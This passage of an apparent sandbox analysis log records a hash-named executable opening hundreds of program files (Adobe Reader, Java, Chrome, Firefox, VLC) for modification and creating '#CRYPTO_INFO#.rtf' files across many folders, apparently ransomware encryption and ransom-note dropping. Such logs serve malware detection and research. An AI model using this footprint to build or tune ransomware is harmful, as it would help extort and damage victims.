Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.servlet_8.1.14.v20131031.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\rhp_world_icon_hover.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\lt_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench_1.2.1.v20140901-1244.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\high-contrast.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fullscreen-exit-press.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\add-comment.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\core_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\zh-tw_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\spectrum_spinner_process.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\server\Xusage.txt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.jobs_3.6.0.v20140424-0053.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\dependentlibs.list 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\vi.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\fil.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_folder-default_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-left.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\eu-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\http.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_patterns_header.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\SearchEmail.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\minidump-analyzer.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\WindowsMedia.mpp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\ct.sym 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedback.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\checkmark-2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.continuation_8.1.14.v20131031.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\setEmbeddedCP.bat 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\cs-cz\PlayStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fr-ma\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\arrow-right.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\digsig_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\plugins\rhp\generic-rhp-app-tool-view.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\CompleteCheckmark2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\cstm_brand_preview2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\he-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\javacpl.cpl 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\comment.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Adobe.Reader.Dependencies.manifest 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_signed_out.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\icons_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\be_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\de_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding_1.4.2.v20140729-1044.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\StartRename.vst 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_cs_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-actions_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\simplexml.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluEmptyFolder_160.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\defaults\pref\channel-prefs.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_cs_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\eclipse.inf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\images\avatar.jpg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\2d.x3d 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.alert_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\locale\org-openide-filesystems_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\sat_logo.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_folder-default_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\th.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_folder-down_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\amd64\jvm.cfg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.greychartplugin_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\RDCNotificationClient.appx 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\ui-strings.js 